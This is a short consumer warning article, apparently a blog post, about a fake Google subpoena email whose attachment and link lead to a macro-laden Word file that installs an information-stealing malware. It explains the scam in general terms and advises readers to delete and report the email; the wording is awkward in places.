Google Subpoena Email Scam: How It Works?

Beware of a fake Google subpoena email scam that has been circulating the internet these days. How does it look? It comes as an email with a subpoena notice from Google, stating that you have been accessing the wrong links on the web. Let’s see how the scam works.

The email indicates that he was “ordered to go to court.” You can see a screenshot of the fake Google citation email below.

The message urges you to prepare all the necessary documents for your court appearance. The list of documents listed in an attachment is nothing more than a compromised zip folder that installs malware on your device. A link with supposedly additional details is also provided. This malicious link leads to a list on Google Drive where you can access the content (don’t!).

The scammer intends to give you 14 days to prepare, otherwise “the court will be held without you.” Grammatical errors should be enough to see this Google citation as a red flag.

So what happens if you open the folder with the fake documents? Like another citation-related scam that made its rounds in November 2019, this one installs malware on computers.

How bad can email be?

The malicious folder and the email link contain a redirect chain that takes you to a macro-laden Microsoft Word file. This macro then downloads the malware through PowerShell, which is a sample of the virus.

The Google Subpoena email scam malware infects the endpoint and leaks your personal information. It mainly targets network settings, browser information, cryptocurrency wallets, VPN and FTP logins, emails, and gaming credentials. Last but not least, take screenshots of your compromised device.

Google Citation Notice – How to Avoid It

There is no such thing as a Google subpoena notice. Eliminate email (eventually report it, see below) and focus on your daily routine. This bogus Google citation is more dangerous than the usual email scams or phishing scams, so be careful.

Your personal information could only be stolen if the chain of infection is successful. What does that mean? The goal is to get victims to click on the link and then download the “documents”, which contain the macros. Essentially, as mentioned, by downloading the file, you enable these macros, which means that you allow the malware to access whatever it wants. Stay away.

Google Citation: How to Report a Scammer

Inform your family and friends about this scam by sharing this article on social media using the buttons provided. You can also officially report scammers and any other suspicious activity to the Federal Trade Commission using the link below: